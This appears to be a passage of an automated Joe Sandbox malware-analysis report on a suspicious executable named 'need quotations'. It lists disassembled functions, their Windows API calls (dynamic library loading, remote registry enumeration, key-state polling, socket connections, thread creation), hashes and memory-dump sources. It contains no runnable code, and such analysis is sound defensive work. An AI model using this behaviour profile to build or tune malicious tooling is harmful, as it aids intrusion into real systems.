VariantInit.OLEAUT32(?), ref: 00281CB4
VariantClear.OLEAUT32(00000013), ref: 00281D26
VariantClear.OLEAUT32(00000000), ref: 00281D81
VariantClear.OLEAUT32(?), ref: 00281DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00281E26

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 39b4b0bd3b4657950feff3f8c6c482f3e3e1cf37de32e8f6caaebe16b69186bf
Instruction ID: d0c41e82e0ff7dfa7c18f6e336996fcb3d0ba395500ecf9f9feb29a01d5b52b4
Opcode Fuzzy Hash: 39b4b0bd3b4657950feff3f8c6c482f3e3e1cf37de32e8f6caaebe16b69186bf
Instruction Fuzzy Hash: 5E516CB9A10209AFDB14DF58C884EAAB7B8FF4C314B158559ED49DB341D330E921CBA0

Function 002A0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002A06EE
GetProcAddress.KERNEL32(00000000,?), ref: 002A077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 002A079B
GetProcAddress.KERNEL32(00000000,?), ref: 002A07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 002A07FB

Part of subcall function 0025E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0028A574,?,?,00000000,00000008), ref: 0025E675
Part of subcall function 0025E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0028A574,?,?,00000000,00000008), ref: 0025E699

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 0e1afaac67cbae0efdc0c760f5715ee91ae97bcdd7399439c2259432fe6a1589
Instruction ID: f5ee09fef12c99ef03a0c73ed3962bad3037cd54ce0c019ee3f4b675e6cb6b6d
Opcode Fuzzy Hash: 0e1afaac67cbae0efdc0c760f5715ee91ae97bcdd7399439c2259432fe6a1589
Instruction Fuzzy Hash: BC515975A10205DFCB04EFA8C885DADF7B5BF49310B1480A9EA15AB352DB70EE55CF80

Function 002A2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002A2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002A2F75
RegCloseKey.ADVAPI32(?,?), ref: 002A2FA1
RegCloseKey.ADVAPI32(00000000), ref: 002A2FAE

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 2e190a5d473f69767802874ec19e1b0f4d2271c7520434622ba655adb273cbe6
Instruction ID: d71cb7215b5f468077ede847bc58eac9f2566144e0b9303004e24a75da6e7cd5
Opcode Fuzzy Hash: 2e190a5d473f69767802874ec19e1b0f4d2271c7520434622ba655adb273cbe6
Instruction Fuzzy Hash: B3514971228204AFD704EF58C881E6AB7F9FF89304F10882DF595972A1DB70E928CF52

Function 002ACCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b6e110a6c5acd5527046de472daf18e98aef2bae333dbb8c4400cddcdfa16f3
Instruction ID: 64d9ba48360b64b5de7da0b78b74eabd501befbb37d9e671d6e0a31c48f07c7f
Opcode Fuzzy Hash: 3b6e110a6c5acd5527046de472daf18e98aef2bae333dbb8c4400cddcdfa16f3
Instruction Fuzzy Hash: CD41D939920509AFC724DF68CC48FA9BF68EB0B310F250175F959A72D1CB70AD61DB90

Function 00291206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002912B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002912DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0029131C

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00291341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00291349

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: b9b7eb13256024d98227d3f02bfa5494872d7df1d04c783c19fed49c228eaa2f
Instruction ID: 015b2bebd4691201d6e4924447839bb227416ae6d80e6c39a8c9fed927a2a793
Opcode Fuzzy Hash: b9b7eb13256024d98227d3f02bfa5494872d7df1d04c783c19fed49c228eaa2f
Instruction Fuzzy Hash: 1F411835A10105DFCF05EF64C981AAEBBF5EF09710B148099E90AAB3A2CB31ED61CF51

Function 0025B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0025B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0025B66C
GetAsyncKeyState.USER32(00000001), ref: 0025B691
GetAsyncKeyState.USER32(00000002), ref: 0025B69F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 21c2df04a0b60f473e2bcb68dbcfc8755e36d703ab6a173407c81d401de48e17
Instruction ID: 728329be2cd917e30293bd662314c643f833e79df8da5fb8032ae827417c88b7
Opcode Fuzzy Hash: 21c2df04a0b60f473e2bcb68dbcfc8755e36d703ab6a173407c81d401de48e17
Instruction Fuzzy Hash: 3D417F35528116FFCF1A9F64C844AE9BBB8FB05365F204319F82996290DB30ADA4DF91

Function 0027B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0027B369
PostMessageW.USER32(?,00000201,00000001), ref: 0027B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0027B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0027B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0027B431

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 30f59babedb347b33f4ea562b3867e2580582a17359e2c5cfc966c1c6a834821
Instruction ID: 6ea2e6115784db9e7fb3c82729a70a9a8d890071fc7318f5bf8b4c0757e7de43
Opcode Fuzzy Hash: 30f59babedb347b33f4ea562b3867e2580582a17359e2c5cfc966c1c6a834821
Instruction Fuzzy Hash: 6631A07191021AEFDF04CF68E94DB9E7BB5EB04319F118269F929AA1D1C3B09964CB90

Function 0027DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0027DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0027DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0027DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0027DC52
_wcsstr.LIBCMT ref: 0027DC5C

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: f897aeab8d49fd71678e012edcd0ac426b924d066164189d3754b5b73ab4f737
Instruction ID: 7b2eb8e091ab0daf3273bece335ed8a3920f373ea881ddf8bd0297e3feed9e34
Opcode Fuzzy Hash: f897aeab8d49fd71678e012edcd0ac426b924d066164189d3754b5b73ab4f737
Instruction Fuzzy Hash: 3E212571224101ABEB165F38AD49E7B7BACDF45720F10803EF80DCA181EAB1DC51D660

Function 002ADE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

GetWindowLongW.USER32(?,000000F0), ref: 002ADEB0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002ADED4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002ADEEC
GetSystemMetrics.USER32(00000004), ref: 002ADF14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00293A1E,00000000), ref: 002ADF32

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 6f1a04dea5773ce9a1b9af128af059b3bb10c856db38316e6ae00ec7dcda8a6b
Instruction ID: 1f2d29f4a3281b2a7b8be2118f8f29dc9905f91c838c4138fa7e88886ad4be1c
Opcode Fuzzy Hash: 6f1a04dea5773ce9a1b9af128af059b3bb10c856db38316e6ae00ec7dcda8a6b
Instruction Fuzzy Hash: B021A171621216AFCB214F789D48B6A77A8FB16325F150735F937CA9E0DB709870CB80

Function 0027BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0027BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0027BCC2
__itow.LIBCMT ref: 0027BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0027BD00
__itow.LIBCMT ref: 0027BD11

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c74de28ea3bad502f4eb9c737aa15cdad1b7764ecab162edcbe1db0f081798a6
Instruction ID: c18ad71aa4e9ae8f420266b903dbc6d08341ce93223d2b4cfea53a6dd806dc4d
Opcode Fuzzy Hash: c74de28ea3bad502f4eb9c737aa15cdad1b7764ecab162edcbe1db0f081798a6
Instruction Fuzzy Hash: 3A213B31620218BFDB26AE649C49FDF7A6CAF4A710F108025F94DEB181DB708D2587A1

Function 00286318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 002450E6: _wcsncpy.LIBCMT ref: 002450FA

GetFileAttributesW.KERNEL32(?,?,?,?,002860C3), ref: 00286369
GetLastError.KERNEL32(?,?,?,002860C3), ref: 00286374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002860C3), ref: 00286388
_wcsrchr.LIBCMT ref: 002863AA

Part of subcall function 00286318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002860C3), ref: 002863E0

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 63de1df0a5a81ae5bf4979d73bef9b25b9a9dfc7824f1ac148a3aa24b4d5db55
Instruction ID: 4c123bb35665d8c1d5fe73f5848f24356cd1b745c4773c387f6584b39f91e35f
Opcode Fuzzy Hash: 63de1df0a5a81ae5bf4979d73bef9b25b9a9dfc7824f1ac148a3aa24b4d5db55
Instruction Fuzzy Hash: 592123345362169BDB21BA78AC4AFEA23ACAF06B61F1000B5F445D30C1EAA099A48B54

Function 00298B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0029A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0029A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00298BD3
WSAGetLastError.WSOCK32(00000000), ref: 00298BE2
connect.WSOCK32(00000000,?,00000010), ref: 00298BFE

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 0f8a30d807f0437385a7e2eeac90c33508b3d45be4c90a4c3c62d2b54a236cf8
Instruction ID: ca5944054a008047de7ec57dd508112f8a94b0be9e7b2208bb699f8efe3f6340
Opcode Fuzzy Hash: 0f8a30d807f0437385a7e2eeac90c33508b3d45be4c90a4c3c62d2b54a236cf8
Instruction Fuzzy Hash: 0F21F0312102009FCB14AF28DC89F7EB7A8AF49710F08845AF902AB3D2CB70EC158B61

Function 00298420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00298441
GetForegroundWindow.USER32 ref: 00298458
GetDC.USER32(00000000), ref: 00298494
GetPixel.GDI32(00000000,?,00000003), ref: 002984A0
ReleaseDC.USER32(00000000,00000003), ref: 002984DB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: e9010cdd43bd09259790533b718af54bc1a8333ae0787ade382a2bdb7742b799
Instruction ID: 115eca865c8b9241fae93ac57c3a2f4750e8577680fb23905b730deb0a81a733
Opcode Fuzzy Hash: e9010cdd43bd09259790533b718af54bc1a8333ae0787ade382a2bdb7742b799
Instruction Fuzzy Hash: 2721A435A10204AFDB00EFA4DC48A5EBBE9EF48301F148479E85A97251CB70ED04CB50

Function 0025AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0025AFE3
SelectObject.GDI32(?,00000000), ref: 0025AFF2
BeginPath.GDI32(?), ref: 0025B009
SelectObject.GDI32(?,00000000), ref: 0025B033

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 024021a9afd53bf4b4bb50a79273b3e39218ccf162f8857a101511f9c1c5ca88
Instruction ID: 7bc75e9bda15e8369ddec085922ef0ca8cba4d61a11897c8fdf7f704b3e76348
Opcode Fuzzy Hash: 024021a9afd53bf4b4bb50a79273b3e39218ccf162f8857a101511f9c1c5ca88
Instruction Fuzzy Hash: A5217770811209EFDB229F55EC58B9A77ACB710356F14431BFC25521E0C3B25865CF95

Function 0026217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 002621A9
CreateThread.KERNEL32(?,?,002622DF,00000000,?,?), ref: 002621ED
GetLastError.KERNEL32 ref: 002621F7
_free.LIBCMT ref: 00262200
__dosmaperr.LIBCMT ref: 0026220B

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 5a1c453590bed2cd650cad54e5e68f944a7bc3bc00c222f9c3e55b4cfc5400cd
Instruction ID: 3fa31288d2ca8c8b804dd30de943c8eea3259fbfcafcd2a18acfeab5bfe56d8c
Opcode Fuzzy Hash: 5a1c453590bed2cd650cad54e5e68f944a7bc3bc00c222f9c3e55b4cfc5400cd
Instruction Fuzzy Hash: F5114832128747AFDB10AFA4EC45D9B7798EF01774B100429FE1886082DB31C8B18EA0

Function 0027ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0027ABD7
GetLastError.KERNEL32(?,0027A69F,?,?,?), ref: 0027ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0027A69F,?,?,?), ref: 0027ABF0
HeapAlloc.KERNEL32(00000000,?,0027A69F,?,?,?), ref: 0027ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0027AC0E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 908af157d14c8e6c63769c8a51ac9cb62abd590b37451a665bfd801a05cca326
Instruction ID: 5ac8e518f90a5d317e64fe226baf6bd4ddb87b7aea34d0663d7a5f77390d1943
Opcode Fuzzy Hash: 908af157d14c8e6c63769c8a51ac9cb62abd590b37451a665bfd801a05cca326
Instruction Fuzzy Hash: E70169B0210205BFDB114FAAEC4CDAB3BACEF8A365710442EF809C3260DA718C51CB61

Function 00287A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00287A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00287A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00287A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287AD0

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: cadb6e1a96e591a553578b6f45bc9787f6b662afd04e59ce2212cfce7e3c8bfe
Instruction ID: d06190663eb2a69cc92af094f6046dd4d04017f0eaefda4fdb0b1ac54f3f7d5f
Opcode Fuzzy Hash: cadb6e1a96e591a553578b6f45bc9787f6b662afd04e59ce2212cfce7e3c8bfe
Instruction Fuzzy Hash: 0D012939C15619EBDF04AFE4EC8CAEDBB78FB08751F150465E502B2290DB7096648BA1

Function 00279ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

